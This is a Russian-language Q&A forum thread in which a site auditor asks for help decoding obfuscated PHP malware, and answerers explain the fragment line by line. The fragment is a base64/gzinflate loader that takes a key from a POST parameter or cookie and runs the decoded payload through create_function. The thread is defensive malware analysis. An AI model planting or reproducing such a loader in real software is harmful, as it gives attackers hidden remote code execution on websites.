@AKYLA

Как расшифровать вредоносный код base64_decode((str_replace(?

Никак не могу расшифровать этот кусок кода, который был найден на проверяемом сайте.
Про переменные понятно, они просто разбиты на куски чтоб нельзя было найти по названию.
В итоге base64 это ($a10=base64_decode((str_replace("\n",'',')

В конце:

if($a10=gzinflate($a10)){
        if(isset(_POST['d42'])) setcookie('d42',_POST['d42']);
        $a10="".create_function((string)null,$a10);
        unset($k36);
        $a10();

Но вот получить результат из base64 никак не выходит, кроме белеберды, то ли это бинарник какой-то, то ли просто я не правильно что-то делаю. Кто хорошо разбирается в PHP, может поможет переделать код чтоб он выдал верный результат?

Полный код тут https://pastebin.com/tfZnLk6k
  • Вопрос задан
  • 118 просмотров
Пригласить эксперта
Ответы на вопрос 3
Rsa97
@Rsa97
Для правильного вопроса надо знать половину ответа
Не хватает данных. Алгоритм использует для дешифровки ключ, приходящий в $_POST['d42'] или $_COOKIE['d42'].
Ответ написан
Комментировать
@Fenix957
if($a10=gzinflate($a10)){
Здесь распаковывается сжатая строка и если результат удачный идет далее
if(isset(_POST['d42'])) setcookie('d42',_POST['d42']);

Здесь проверяется наличие пост параметра возможно используется гдето в дальнейшем. возможно авторизация или чтото еще

$a10="".create_function((string)null,$a10);
Переменная а10 становиться функцией. (string)null обозначает что у функции нет аргументов
$a10) код самой функции кторый был отправлен
unset($k36);
удаляется переменная
$a10();
Вызывается полезная нагрузка только что созданной функции
Ответ написан
Комментировать
@amorka89
Разработка и администрирование!
ну тут ещё не понятно что в переменной $k36, она судя по всему где-то ранее по коду инициализируется, а так тут да, вызов на выполнение того что будет в $a10.
я думаю тут сразу после if($a10=gzinflate($a10)){ надо смотреть что там в $a10 после декомпрессии.

У меня был похожий случай и таким г... были почти все скрипты побиты, но код ко всему самозаражение ещё устраивал.
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы